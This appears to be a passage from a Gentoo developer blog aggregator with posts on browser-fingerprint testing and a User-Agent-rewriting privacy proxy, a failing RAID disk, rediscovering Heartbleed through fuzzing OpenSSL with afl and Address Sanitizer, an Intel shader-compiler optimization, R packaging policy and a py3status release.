Browser Plugin Details          577,620.56        259,929.65                    7,351.75
Time Zone                       6.51              6.51                          6.51
Screen Size and Color Depth     13.72             13.72                         13.72
System Fonts                    5,198,585.00      5,198,585.00                  5.10
                                                                                (Flash and Java disabled)
Are Cookies Enabled?            1.35              1.35                          1.35
Limited supercookie test        1.83              1.83                          1.83

User agent and browser plug-ins hurt, fonts alone kill me altogether. Ouch.

Update:

  • It’s the very same when browsing with an incognito window. Re-reading what that feature is officially intended to do (keeping you incognito from your own browsing history), this stops being a surprise.
  • Chromium (with Flash/Java disabled) added

Thoughts on fixing this issue:

I’m not sure yet how I want to fix this myself. Faking popular values (in a popular combination, so that it doesn’t fire back) could work using a local proxy, a browser patch, or maybe a browser plug-in; a rough sketch of the proxy idea follows below. Obtaining genuinely popular value combinations is another question. Fake values can also reduce the quality of the content I am served, so I would probably not fake my screen resolution, or at least make sure not to deviate from it by much.
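
To make the local proxy idea a bit more tangible, here is a very rough sketch of a plain-HTTP forward proxy that swaps in a fixed User-Agent. The User-Agent value is only a placeholder (not a measured “popular” one), HTTPS/CONNECT is not handled at all, and other fingerprint sources (plugins, fonts, screen size) are untouched, so this is an illustration of the idea rather than a fix:

# Rough sketch only: plain-HTTP forward proxy that rewrites the User-Agent.
# The POPULAR_UA value is a placeholder, not a measured "most popular" string.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

POPULAR_UA = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/42.0.2311.68 Safari/537.36")

class RewritingProxy(BaseHTTPRequestHandler):
    def do_GET(self):
        # Copy the client's headers, but drop hop-by-hop ones and force our own UA.
        headers = {k: v for k, v in self.headers.items()
                   if k.lower() not in ("user-agent", "accept-encoding",
                                        "proxy-connection", "connection")}
        headers["User-Agent"] = POPULAR_UA
        try:
            resp = urlopen(Request(self.path, headers=headers))
        except HTTPError as err:
            resp = err                      # HTTPError doubles as a response object
        body = resp.read()
        self.send_response(resp.getcode())
        self.send_header("Content-Type",
                         resp.headers.get("Content-Type", "application/octet-stream"))
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    # Point the browser's HTTP proxy setting at 127.0.0.1:8080 to route requests through it.
    HTTPServer(("127.0.0.1", 8080), RewritingProxy).serve_forever()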

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Almost quiet dataloss (April 11, 2015, 11:06 UTC)

Some harddisk manufacturers have interesting ideas ... using some old Samsung disks in a RAID5 config:

[15343.451517] ata3.00: exception Emask 0x0 SAct 0x40008410 SErr 0x0 action 0x6 frozen
[15343.451522] ata3.00: failed command: WRITE FPDMA QUEUED
[15343.451527] ata3.00: cmd 61/20:20:d8:7d:6c/01:00:07:00:00/40 tag 4 ncq 147456 out
                        res 40/00:00:00:4f:c2/00:00:00:00:00/00 Emask 0x4 (timeout)                                                                                                                                                                                            
[15343.451530] ata3.00: status: { DRDY }
[15343.451532] ata3.00: failed command: WRITE FPDMA QUEUED
[15343.451536] ata3.00: cmd 61/30:50:d0:2f:40/00:00:0d:00:00/40 tag 10 ncq 24576 out
                        res 40/00:ff:00:00:00/00:00:00:00:00/00 Emask 0x4 (timeout)                                                                                                                                                                                            
[15343.451538] ata3.00: status: { DRDY }
[15343.451540] ata3.00: failed command: WRITE FPDMA QUEUED
[15343.451544] ata3.00: cmd 61/a8:78:90:be:da/00:00:0b:00:00/40 tag 15 ncq 86016 out
                        res 40/00:ff:00:00:00/00:00:00:00:00/00 Emask 0x4 (timeout)                                                                                                                                                                                            
[15343.451546] ata3.00: status: { DRDY }
[15343.451549] ata3.00: failed command: READ FPDMA QUEUED
[15343.451552] ata3.00: cmd 60/38:f0:c0:2b:d6/00:00:0e:00:00/40 tag 30 ncq 28672 in
                        res 40/00:00:00:4f:c2/00:00:00:00:00/00 Emask 0x4 (timeout)                                                                                                                                                                                            
[15343.451555] ata3.00: status: { DRDY }
[15343.451557] ata3: hard resetting link
[15343.911891] ata3: SATA link up 3.0 Gbps (SStatus 123 SControl 300)
[15344.062112] ata3.00: configured for UDMA/133
[15344.062130] ata3.00: device reported invalid CHS sector 0
[15344.062139] ata3.00: device reported invalid CHS sector 0
[15344.062146] ata3.00: device reported invalid CHS sector 0
[15344.062153] ata3.00: device reported invalid CHS sector 0
[15344.062169] ata3: EH complete
Hmm, that doesn't look too good ... but mdadm still believes the RAID is functional.

And a while later things like this happen:
[ 2968.701999] XFS (md4): Metadata corruption detected at xfs_dir3_data_read_verify+0x72/0x77 [xfs], block 0x36900a0
[ 2968.702004] XFS (md4): Unmount and run xfs_repair
[ 2968.702007] XFS (md4): First 64 bytes of corrupted metadata buffer:
[ 2968.702011] ffff8802ab5cf000: 04 00 00 00 99 00 00 00 fc ff ff ff ff ff ff ff  ................
[ 2968.702015] ffff8802ab5cf010: 03 00 00 00 00 00 00 00 02 00 00 00 9e 00 00 00  ................
[ 2968.702018] ffff8802ab5cf020: 0c 00 00 00 00 00 00 00 13 00 00 00 00 00 00 00  ................
[ 2968.702021] ffff8802ab5cf030: 04 00 00 00 82 00 00 00 fc ff ff ff ff ff ff ff  ................
[ 2968.702048] XFS (md4): metadata I/O error: block 0x36900a0 ("xfs_trans_read_buf_map") error 117 numblks 8
[ 2968.702476] XFS (md4): Metadata corruption detected at xfs_dir3_data_reada_verify+0x69/0x6d [xfs], block 0x36900a0
[ 2968.702491] XFS (md4): Unmount and run xfs_repair
[ 2968.702494] XFS (md4): First 64 bytes of corrupted metadata buffer:
[ 2968.702498] ffff8802ab5cf000: 04 00 00 00 99 00 00 00 fc ff ff ff ff ff ff ff  ................
[ 2968.702501] ffff8802ab5cf010: 03 00 00 00 00 00 00 00 02 00 00 00 9e 00 00 00  ................
[ 2968.702505] ffff8802ab5cf020: 0c 00 00 00 00 00 00 00 13 00 00 00 00 00 00 00  ................
[ 2968.702508] ffff8802ab5cf030: 04 00 00 00 82 00 00 00 fc ff ff ff ff ff ff ff  ................
[ 2968.702825] XFS (md4): Metadata corruption detected at xfs_dir3_data_read_verify+0x72/0x77 [xfs], block 0x36900a0
[ 2968.702831] XFS (md4): Unmount and run xfs_repair
[ 2968.702834] XFS (md4): First 64 bytes of corrupted metadata buffer:
[ 2968.702839] ffff8802ab5cf000: 04 00 00 00 99 00 00 00 fc ff ff ff ff ff ff ff  ................
[ 2968.702842] ffff8802ab5cf010: 03 00 00 00 00 00 00 00 02 00 00 00 9e 00 00 00  ................
[ 2968.702866] ffff8802ab5cf020: 0c 00 00 00 00 00 00 00 13 00 00 00 00 00 00 00  ................
[ 2968.702871] ffff8802ab5cf030: 04 00 00 00 82 00 00 00 fc ff ff ff ff ff ff ff  ................
[ 2968.702888] XFS (md4): metadata I/O error: block 0x36900a0 ("xfs_trans_read_buf_map") error 117 numblks 8
fsck finds quite a lot of data not being where it should be.
I'm not sure who to blame here - the kernel should actively punch out any harddisk that is flopping around like a fish on land, the md layer should hate on any device that even looks weird, but somehow "just doing a link reset" is considered enough.

I'm not really upset that a cheap disk that is now ~9 years old decides to develop dementia, but I'm quite unhappy with the firmware programming that doesn't seem to consider data loss a problem ... (but at least it's not Seagate!)

April 08, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

Quote: “With this petition we demand a general ban, without exceptions, on fracking for hydrocarbons in Germany!”

https://www.change.org/p/bundestag-fracking-gesetzlich-verbieten-ausgfrackt-is

April 07, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)
How Heartbleed could've been found (April 07, 2015, 13:23 UTC)

tl;dr With a reasonably simple fuzzing setup I was able to rediscover the Heartbleed bug. This uses state-of-the-art fuzzing and memory protection technology (american fuzzy lop and Address Sanitizer), but it doesn't require any prior knowledge about specifics of the Heartbleed bug or the TLS Heartbeat extension. We can learn from this how to find similar bugs in the future.

Exactly one year ago a bug in the OpenSSL library became public that is one of the most well-known security bugs of all time: Heartbleed. It is a bug in the code of a TLS extension that up until then was barely known to anybody. A read buffer overflow allowed an attacker to extract parts of the memory of every server using OpenSSL.

Can we find Heartbleed with fuzzing?

Heartbleed was introduced in OpenSSL 1.0.1, which was released in March 2012, two years earlier. Many people wondered how it could've been hidden there for so long. David A. Wheeler wrote an essay discussing how fuzzing and memory protection technologies could've detected Heartbleed. It covers many aspects in detail, but in the end he only offers speculation on whether or not fuzzing would have found Heartbleed. So I wanted to try it out.

Of course it is easy to find a bug if you know what you're looking for. As far as reasonably possible, I tried not to use any specific information I had about Heartbleed. I created a setup that's reasonably simple and similar to what someone might have tried without knowing anything about the specifics of Heartbleed.

Heartbleed is a read buffer overflow. What that means is that an application is reading outside the boundaries of a buffer. For example, imagine an application has a space in memory that's 10 bytes long. If the software tries to read 20 bytes from that buffer, you have a read buffer overflow. It will read whatever is in the memory located after the 10 bytes. These bugs are fairly common and the basic concept of exploiting buffer overflows is pretty old. Just to give you an idea how old: Recently the Chaos Computer Club celebrated the 30th anniversary of a hack of the German BtX-System, an early online service. They used a buffer overflow that was in many aspects very similar to the Heartbleed bug. (It is actually disputed if this is really what happened, but it seems reasonably plausible to me.)

Fuzzing is a widely used strategy to find security issues and bugs in software. The basic idea is simple: Give the software lots of inputs with small errors and see what happens. If the software crashes you likely found a bug.

When buffer overflows happen an application doesn't always crash. Often it will just read from (or write to, if it is a write overflow) the memory that happens to be there. Whether it crashes depends on a lot of circumstances. Most of the time read overflows won't crash your application. That's also the case with Heartbleed. There are a couple of technologies that improve the detection of memory access errors like buffer overflows. An old and well-known one is the debugging tool Valgrind. However, Valgrind slows down applications a lot (around 20 times slower), so it is not really well suited for fuzzing, where you want to run an application millions of times on different inputs.

Address Sanitizer finds more bugs

A better tool for our purpose is Address Sanitizer. David A. Wheeler calls it “nothing short of amazing”, and I want to reiterate that. I think it is a tool that every C/C++ software developer should know and use for testing.

Address Sanitizer is part of the C compiler and has been included in the two most common compilers in the free software world, gcc and llvm. To use Address Sanitizer one has to recompile the software with the command line parameter -fsanitize=address. It slows down applications, but only by a relatively small amount. According to their own numbers, an application using Address Sanitizer is around 1.8 times slower. This makes it feasible for fuzzing tasks.

For the fuzzing itself a tool that recently gained a lot of popularity is american fuzzy lop (afl). It was developed by Michal Zalewski from the Google security team, who is also known by his nickname lcamtuf. As far as I'm aware the approach of afl is unique. It adds instructions to an application during compilation that allow the fuzzer to detect new code paths while running the fuzzing tasks. If a new interesting code path is found, then the sample that created this code path is used as the starting point for further fuzzing.

Currently afl only uses file inputs and cannot directly fuzz network input. OpenSSL has a command line tool that allows all kinds of file inputs, so you can use it for example to fuzz the certificate parser. But this approach does not allow us to directly fuzz the TLS connection, because that only happens on the network layer. By fuzzing various file inputs I recently found two issues in OpenSSL, but both had been found by Brian Carpenter before, who at the same time was also fuzzing OpenSSL.

Let OpenSSL talk to itself

So to fuzz the TLS network connection I had to create a workaround. I wrote a small application that creates two instances of OpenSSL that talk to each other. This application doesn't do any real networking; it just passes buffers back and forth and thus performs a TLS handshake between a server and a client. Each message packet is written to a file. This results in six files, but the last two are just empty, because at that point the handshake is finished and no more data is transmitted. So we have four files that contain actual data from a TLS handshake. If you want to dig into this, a good description of a TLS handshake is provided by the developers of OCaml-TLS and MirageOS.

Then I added the possibility of switching out parts of the handshake messages with files I pass on the command line. By calling my test application selftls with a number and a filename, a handshake message gets replaced by the contents of that file. So to test just the first part of the server handshake I'd call the test application, take the output file packet-1 and pass it back again to the application by running selftls 1 packet-1. Now we have all the pieces we need to use american fuzzy lop and fuzz the TLS handshake.
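
For readers who would rather see the shape of such a harness than read the C code, here is a rough Python analogue built on the standard library's in-memory TLS objects (ssl.MemoryBIO and SSLContext.wrap_bio). The certificate file names are placeholders and the whole thing is a simplified illustration of the idea, not the actual selftls.c:

# Simplified analogue of "let OpenSSL talk to itself": two in-memory TLS endpoints
# shake hands by passing buffers, and every flight is dumped to a packet-N file
# (the files a fuzzer would later mutate). Certificate file names are placeholders.
import ssl

server_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_ctx.load_cert_chain("dummy-cert.pem", "dummy-key.pem")   # throwaway test cert
client_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_ctx.check_hostname = False
client_ctx.verify_mode = ssl.CERT_NONE                          # no security wanted, just bugs

srv_in, srv_out = ssl.MemoryBIO(), ssl.MemoryBIO()
cli_in, cli_out = ssl.MemoryBIO(), ssl.MemoryBIO()
server = server_ctx.wrap_bio(srv_in, srv_out, server_side=True)
client = client_ctx.wrap_bio(cli_in, cli_out, server_side=False)

packet = 0

def pump(endpoint, outgoing, peer_incoming):
    """Advance one endpoint's handshake and hand whatever it produced to its peer."""
    global packet
    try:
        endpoint.do_handshake()
    except ssl.SSLWantReadError:
        pass                        # normal until the handshake has completed
    data = outgoing.read()          # everything this endpoint wants to send right now
    packet += 1
    with open("packet-%d" % packet, "wb") as f:
        f.write(data)
    peer_incoming.write(data)

for _ in range(3):                  # three round trips give six files, the last ones empty
    pump(client, cli_out, srv_in)
    pump(server, srv_out, cli_in)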

I compiled OpenSSL 1.0.1f, the last version that was vulnerable to Heartbleed, with american fuzzy lop. This can be done by calling ./config and then replacing gcc in the Makefile with afl-gcc. We also want to use Address Sanitizer; to do so we have to set the environment variable AFL_USE_ASAN to 1.

There are some issues when using Address Sanitizer with american fuzzy lop. Address Sanitizer needs a lot of virtual memory (many terabytes). American fuzzy lop limits the amount of memory an application may use. It is not trivially possible to limit only the real amount of memory an application uses and not the virtual amount, therefore american fuzzy lop cannot handle this flawlessly. Different solutions for this problem have been proposed and are currently being developed. I usually go with the simplest solution: I just disable the memory limit of afl (parameter -m -1). This poses a small risk: a fuzzed input may lead an application into a state where it uses all available memory and thereby causes other applications on the same system to malfunction. Based on my experience this is very rare, so I usually just ignore that potential problem.

After having compiled OpenSSL 1.0.1f we have two files libssl.a and libcrypto.a. These are static versions of OpenSSL and we will use them for our test application. We now also use the afl-gcc to compile our test application:

AFL_USE_ASAN=1 afl-gcc selftls.c -o selftls libssl.a libcrypto.a -ldl

Now we run the application. It needs a dummy certificate; I have put one in the repo. To make things faster I'm using a 512 bit RSA key. This is completely insecure, but as we don't want any security here – we just want to find bugs – this is fine, because a smaller key makes things faster. However, if you want to try fuzzing the latest OpenSSL development code you need to create a larger key, because it'll refuse to accept such small keys.

The application will give us six packet files, however the last two will be empty. We only want to fuzz the very first step of the handshake, so we're interested in the first packet. We will create an input directory for american fuzzy lop called in and place packet-1 in it. Then we can run our fuzzing job:

afl-fuzz -i in -o out -m -1 -t 5000 ./selftls 1 @@

american fuzzy lop screenshot

We pass the input and output directory, disable the memory limit and increase the timeout value, because TLS handshakes are slower than common fuzzing tasks. On my test machine, afl found the first crash around 6 hours later. Now we can manually pass our output to the test application and get a stack trace from Address Sanitizer:

==2268==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x629000013748 at pc 0x7f228f5f0cfa bp 0x7fffe8dbd590 sp 0x7fffe8dbcd38
READ of size 32768 at 0x629000013748 thread T0
#0 0x7f228f5f0cf9 (/usr/lib/gcc/x86_64-pc-linux-gnu/4.9.2/libasan.so.1+0x2fcf9)
#1 0x43d075 in memcpy /usr/include/bits/string3.h:51
#2 0x43d075 in tls1_process_heartbeat /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/ssl/t1_lib.c:2586
#3 0x50e498 in ssl3_read_bytes /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/ssl/s3_pkt.c:1092
#4 0x51895c in ssl3_get_message /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/ssl/s3_both.c:457
#5 0x4ad90b in ssl3_get_client_hello /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/ssl/s3_srvr.c:941
#6 0x4c831a in ssl3_accept /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/ssl/s3_srvr.c:357
#7 0x412431 in main /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/selfs.c:85
#8 0x7f228f03ff9f in __libc_start_main (/lib64/libc.so.6+0x1ff9f)
#9 0x4252a1 (/data/openssl/openssl-handshake/openssl-1.0.1f-nobreakrng-afl-asan-fuzz/selfs+0x4252a1)

0x629000013748 is located 0 bytes to the right of 17736-byte region [0x62900000f200,0x629000013748)
allocated by thread T0 here:
#0 0x7f228f6186f7 in malloc (/usr/lib/gcc/x86_64-pc-linux-gnu/4.9.2/libasan.so.1+0x576f7)
#1 0x57f026 in CRYPTO_malloc /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/crypto/mem.c:308


We can see here that the crash is a heap buffer overflow doing an invalid read access of around 32 Kilobytes in the function tls1_process_heartbeat(). It is the Heartbleed bug. We found it.

I want to mention a couple of things that I found out while trying this. I did some things that I thought were necessary, but later it turned out that they weren't. After Heartbleed broke the news, a number of reports stated that Heartbleed was partly the fault of OpenSSL's memory management. A mail by Theo de Raadt claiming that OpenSSL has “exploit mitigation countermeasures” was widely quoted. I was aware of that, so I first tried to compile OpenSSL without its own memory management. That can be done by calling ./config with the option no-buf-freelist.

But it turns out that although OpenSSL uses its own memory management, that doesn't defeat Address Sanitizer. I could replicate my fuzzing finding with OpenSSL compiled with its default options. Although it does its own allocation management, it still calls the system's normal malloc() function for every new memory allocation. A blog post by Chris Rohlf digs into the details of the OpenSSL memory allocator.

Breaking random numbers for deterministic behaviour

When fuzzing the TLS handshake american fuzzy lop will report a red number counting variable runs of the application. The reason for that is that a TLS handshake uses random numbers to create the master secret that's later used to derive cryptographic keys. Also the RSA functions will use random numbers. I wrote a patch to OpenSSL to deliberately break the random number generator and let it only output ones (it didn't work with zeros, because OpenSSL will wait for non-zero random numbers in the RSA function).

During my tests this had no noticeable impact on the time it took afl to find Heartbleed. Still, I think it is a good idea to remove nondeterministic behavior when fuzzing cryptographic applications. Later in the handshake timestamps are also used; this can be circumvented with libfaketime, but for the initial handshake processing that I fuzzed to find Heartbleed it doesn't matter.

Conclusion

You may ask now what the point of all this is. Of course we already know where Heartbleed is, it has been patched, fixes have been deployed and it is mostly history. It's been analyzed thoroughly.

The question has been asked whether Heartbleed could've been found by fuzzing. I'm confident in saying the answer is yes. One thing I should mention here, however: american fuzzy lop was already available back then, but it was barely known. It only received major attention later in 2014, after Michal Zalewski used it to find two variants of the Shellshock bug. Earlier versions of afl were much less handy to use, e.g. they didn't have 64 bit support out of the box. I remember that I failed to use an earlier version of afl with Address Sanitizer; it was only possible after a couple of issues were fixed. A lot of other things have been improved in afl, so at the time Heartbleed was found american fuzzy lop probably wasn't in a state that would've allowed finding it in an easy, straightforward way.

I think the takeaway message is this: we have powerful tools freely available that are capable of finding bugs like Heartbleed. We should use them and look for the other Heartbleeds that are still lingering in our software. Take a look at the Fuzzing Project if you're interested in further fuzzing work. There are beginner tutorials that I wrote with the idea of showing people that fuzzing is an easy way to find bugs and improve software quality.

I already used my sample application to fuzz the latest OpenSSL code. Nothing was found yet, but of course this could be further tweaked by trying different protocol versions, extensions and other variations in the handshake.

I also wrote a German article about this finding for the IT news webpage Golem.de.

Update:

I want to point out some feedback I got that I think is noteworthy.

On Twitter it was mentioned that Codenomicon actually found Heartbleed via fuzzing. There's a YouTube video from Codenomicon's Antti Karjalainen explaining the details. However, the way they did this was quite different: they built a protocol-specific fuzzer. The remarkable feature of afl is that it is very powerful without knowing anything specific about the protocol used. It should also be noted that Heartbleed was found twice; the first finder was Neel Mehta from Google.

Kostya Serebryany mailed me that he was able to replicate my findings with his own fuzzer which is part of LLVM, and it was even faster.

In the comments Michele Spagnuolo mentions that by compiling OpenSSL with -DOPENSSL_TLS_SECURITY_LEVEL=0 one can use very short and insecure RSA keys even in the latest version. Of course this shouldn't be done in production, but it is helpful for fuzzing and other testing efforts.

Matt Turner a.k.a. mattst88 (homepage, bugs)
Combining constants in i965 fragment shaders (April 07, 2015, 04:00 UTC)

On Intel's Gen graphics, three source instructions like MAD and LRP cannot have constants as arguments. When support for MAD instructions was introduced with Sandybridge, we assumed the choice between a MOV+MAD and a MUL+ADD sequence was inconsequential, so we chose to perform the multiply and add operations separately. Revisiting that assumption has uncovered some interesting things about the hardware and has led us to some pretty nice performance improvements.

On Gen 7 hardware (Ivybridge, Haswell, Baytrail), multiplies and adds without immediate value arguments can be co-issued, meaning that multiple instructions can be issued from the same execution unit in the same cycle. MADs, never having immediates as sources, can always be co-issued. Considering that, we should prefer MADs, but a typical vec4 * vec4 + vec4(constant) pattern would lead to three duplicate (four total) MOV imm instructions.

mov(8)  g10<1>F    1.0F
mov(8)  g11<1>F    1.0F
mov(8)  g12<1>F    1.0F
mov(8)  g13<1>F    1.0F
mad(8)  g40<1>F    g10<8,8,1>F   g20<8,8,1>F   g30<8,8,1>F
mad(8)  g41<1>F    g11<8,8,1>F   g21<8,8,1>F   g31<8,8,1>F
mad(8)  g42<1>F    g12<8,8,1>F   g22<8,8,1>F   g32<8,8,1>F
mad(8)  g43<1>F    g13<8,8,1>F   g23<8,8,1>F   g33<8,8,1>F

Should be easy to clean up, right? We should simply combine those 1.0F MOVs and modify the MAD instructions to access the same register. Well, conceptually yes, but in practice not quite.

Since the i965 driver's fragment shader backend doesn't use static single assignment form (it's on our TODO list), our common subexpression elimination pass has to emit a MOV instruction when combining instructions. As a result, performing common subexpression elimination on immediate MOVs would undo constant propagation and the compiler's optimizer would go into an infinite loop. Not what you wanted.

Instead, I wrote a pass that scans the instruction list after the main optimization loop and creates a list of immediate values that are used. If an immediate value is used by a 3-source instruction (a MAD or a LRP) or at least four times by an instruction that can co-issue (ADD, MUL, CMP, MOV) then it's put into a register and sourced from there.
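
To illustrate just that selection logic, here is a small sketch; the instruction representation is invented for the example and this is not the actual Mesa pass, which operates on the i965 backend IR in C:

# Toy model of the selection rule: an immediate is promoted to a register if it is
# used by a 3-source instruction, or at least four times by a co-issueable one.
from collections import defaultdict

THREE_SOURCE = {"MAD", "LRP"}
CO_ISSUEABLE = {"ADD", "MUL", "CMP", "MOV"}

def immediates_to_promote(instructions):
    """Pick the immediates worth loading into a register once and sourcing from there."""
    counts = defaultdict(lambda: [0, 0])     # imm -> [3-source uses, co-issueable uses]
    for opcode, sources in instructions:
        for src in sources:
            if isinstance(src, float):       # a float source stands in for an immediate
                if opcode in THREE_SOURCE:
                    counts[src][0] += 1
                elif opcode in CO_ISSUEABLE:
                    counts[src][1] += 1
    return {imm for imm, (three_src, co_issue) in counts.items()
            if three_src >= 1 or co_issue >= 4}

# The vec4 * vec4 + vec4(1.0) pattern from the listing above, before lowering:
program = [("MAD", (1.0, "g20", "g30")), ("MAD", (1.0, "g21", "g31")),
           ("MAD", (1.0, "g22", "g32")), ("MAD", (1.0, "g23", "g33"))]
print(immediates_to_promote(program))        # -> {1.0}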

But there's still room for improvement. Each general register can store 8 floats, and instead of storing 8 separate constants in each, we're storing a single constant 8 times (and on SIMD16, 16 times!). Fixing that wasn't hard, and it significantly reduces register usage - we now only use one register for each 8 immediate values. Using a special vector-float immediate type we can even load four floating-point values in a single instruction.

With that in place, we can now always emit MAD instructions.

I'm pretty pleased with the results. Without using the New Intermediate Representation (NIR), the shader-db results are:

total instructions in shared programs: 5895414 -> 5747578 (-2.51%)
instructions in affected programs:     3618111 -> 3470275 (-4.09%)

And with NIR (that already unconditionally emits MAD instructions):

total instructions in shared programs: 7992936 -> 7772474 (-2.76%)
instructions in affected programs:     3738730 -> 3518268 (-5.90%)

Effects on a WebGL microbenchmark

In December, I checked what effect my constant combining pass would have on a WebGL procedural noise demo. The demo generates an effect ("noise") that looks like a ball of fire. Its fragment shader contains a ton of instructions but no texturing operations. We're currently able to compile the program in SIMD8 without spilling any registers, but at a cost of scheduling the instructions very badly.

Noise Demo in action

The effects the constant combining pass has on this demo are really interesting, and it actually gives me evidence that some of the ideas I had for the pass are valid, namely that co-issuing instructions is worth a little extra register pressure.

  1. 1.00x FPS of baseline - 3123 instructions - baseline
  2. 1.09x FPS of baseline - 2841 instructions - after promoting constants only if used by more than 2 MADs

Going from no-constant-combining to restricted-constant-combining gives us a 9% increase in frames per second for a 9% instruction count reduction. We're totally limited by fragment shader performance.

  3. 1.46x FPS of baseline - 2841 instructions - after promoting any constant used by a MAD

Going from step 2 to 3 though is interesting. The instruction count doesn't change, but we reduced register pressure sufficiently that we can now schedule instructions better without spilling (SCHEDULE_PRE, instead of SCHEDULE_PRE_NON_LIFO) - a 33% speed up just by rearranging instructions.

  4. 1.62x FPS of baseline - 2852 instructions - after promoting constants used by at least 4 co-issueable instructions

I was worried that we weren't going to be able to measure any performance difference from pulling constants out of co-issueable instructions, but we can definitely get a nice improvement here, of about 10% increase in frames per second.

As an aside, I did an experiment to see what would happen if we used SCHEDULE_PRE and spilled registers anyway (I added a couple of extra instructions to increase register pressure over the threshold). I changed the window size to 2048x2048 and rendered a fixed number of frames.

  • SCHEDULE_PRE with no spills: 17.5 seconds
  • SCHEDULE_PRE with 4 spills (8 send instructions): 17.5 seconds
  • SCHEDULE_PRE_NON_LIFO with no spills: 28 seconds

So there's some good evidence that the cure is worse than the disease. Of course this demo doesn't do any texturing, so memory bandwidth is not at a premium.

  5. 1.76x FPS of baseline - 2609 instructions - ???

I ran the demo to see if we'd made any changes in the last two months and was pleasantly surprised to find that we'd cut another 9% of instructions. I have no idea what caused it, but I'll take it! Combined with everything else, we're up to a 76% performance improvement.

Where's the code

The Mesa patches that implement the constant combining pass were committed (commit bb33a31c) and will be in the next major release (presumably version 10.6).

If any of this sounds interesting enough that you'd like to do it for a living, feel free to contact me. My team at Intel is responsible for the open source 3D driver in Mesa and is looking for new talent.

April 05, 2015
Denis Dupeyron a.k.a. calchan (homepage, bugs)

Here’s a bug and my response to it which both deserve a little bit more visibility than being buried under some random bug number. I’m actually surprised nobody complained about that before.

GNU R supports to run
> install.packages('ggplot2')
in the R console as user. The library ggplot2 will then be installed in users home. Most distros like debian and the like provide a package per library.

First, thank you for pointing out that it is possible to install and maintain your own packages in your $HOME. It didn’t use to work, and the reason why it now does is a little further down but I will not spoil it.

Here’s my response:

Please, do not ever add R packages to the tree. There are thousands of them and they are mostly very badly written, to be polite. If you look at other distros you will see that they give an illusion of having some R packages, but almost all of them (if not all) are seriously lagging behind their respective upstream or simply unmaintained. The reason is that it’s a massive amount of very frustrating and pointless work.

Upstream recommends maintaining your packages yourself in your $HOME and we’ll go with that. I sent patches a couple of years ago to fix the way this works, and now (as you can obviously see) it does work correctly on all distros, not just Gentoo. Also, real scientists usually like to lock down the exact versions of the packages they use, which is not possible when they are maintained by a third party.

If you want to live on the edge then feel free to ask Benda Xu (heroxbd) for an access to the R overlay repository. It serves tens of thousands of ebuilds for R packages automatically converted from a number of sources. It mostly works, and helps in preserving a seemingly low but nonetheless functional level of mental sanity of your beloved volunteer developers.

That, or you maintain your own overlay of packages and have it added to layman.

While we are on that subject, I would like to publicly thank André Erdmann for the fantastic work he has done over the past few years. He wrote, and still occasionally updates, the magical software which runs behind the R overlay server. Thank you, André.

March 31, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

It’s at 4:17 if you would like to skip the first prime-number-based slam. No more math after that. Though you may miss something.


Alexys Jacob a.k.a. ultrabug (homepage, bugs)
py3status v2.4 (March 31, 2015, 13:53 UTC)

I’m very pleased to announce this new release of py3status, because it is by far the most contributed-to one, with a total of 33 files changed, 1625 insertions and 509 deletions!

I’ll start by thanking this release’s contributors, with a special mention for Federico Ceratto for his precious insights, his CLI idea and implementation, and his other module contributions.

Thank you

  • Federico Ceratto
  • @rixx (and her amazing reactivity)
  • J.M. Dana
  • @Gamonics
  • @guilbep
  • @lujeni
  • @obb
  • @shankargopal
  • @thomas-

IMPORTANT

In order to keep a clean and efficient code base, this is the last version of py3status supporting the legacy module loading and ordering; this behavior will be dropped in the next version, 2.5!

CLI commands

py3status now supports some CLI commands which allow you to get information about all the available modules and their documentation.

  • list all available modules

if you specify your own inclusion folder(s) with the -i parameter, your modules will be listed too!

$ py3status modules list
Available modules:
  battery_level          Display the battery level.
  bitcoin_price          Display bitcoin prices using bitcoincharts.com.
  bluetooth              Display bluetooth status.
  clementine             Display the current "artist - title" playing in Clementine.
  dpms                   Activate or deactivate DPMS and screen blanking.
  glpi                   Display the total number of open tickets from GLPI.
  imap                   Display the unread messages count from your IMAP account.
  keyboard_layout        Display the current keyboard layout.
  mpd_status             Display information from mpd.
  net_rate               Display the current network transfer rate.
  netdata                Display network speed and bandwidth usage.
  ns_checker             Display DNS resolution success on a configured domain.
  online_status          Display if a connection to the internet is established.
  pingdom                Display the latest response time of the configured Pingdom checks.
  player_control         Control music/video players.
  pomodoro               Display and control a Pomodoro countdown.
  scratchpad_counter     Display the amount of windows in your i3 scratchpad.
  spaceapi               Display if your favorite hackerspace is open or not.
  spotify                Display information about the current song playing on Spotify.
  sysdata                Display system RAM and CPU utilization.
  vnstat                 Display vnstat statistics.
  weather_yahoo          Display Yahoo! Weather forecast as icons.
  whoami                 Display the currently logged in user.
  window_title           Display the current window title.
  xrandr                 Control your screen(s) layout easily.
  • get available modules details and configuration
$ py3status modules details
Available modules:
  battery_level          Display the battery level.
                         
                         Configuration parameters:
                             - color_* : None means - get it from i3status config
                             - format : text with "text" mode. percentage with % replaces {}
                             - hide_when_full : hide any information when battery is fully charged
                             - mode : for primitive-one-char bar, or "text" for text percentage ouput
                         
                         Requires:
                             - the 'acpi' command line
                         
                         @author shadowprince, AdamBSteele
                         @license Eclipse Public License
                         ---
[...]

Modules changelog

  • new bluetooth module by J.M. Dana
  • new online_status module by @obb
  • new player_control module, by Federico Ceratto
  • new spotify module, by Pierre Guilbert
  • new xrandr module to handle your screens layout from your bar
  • dpms module activate/deactivate the screensaver as well
  • imap module various configuration and optimizations
  • pomodoro module can use DBUS notify, play sounds and be paused
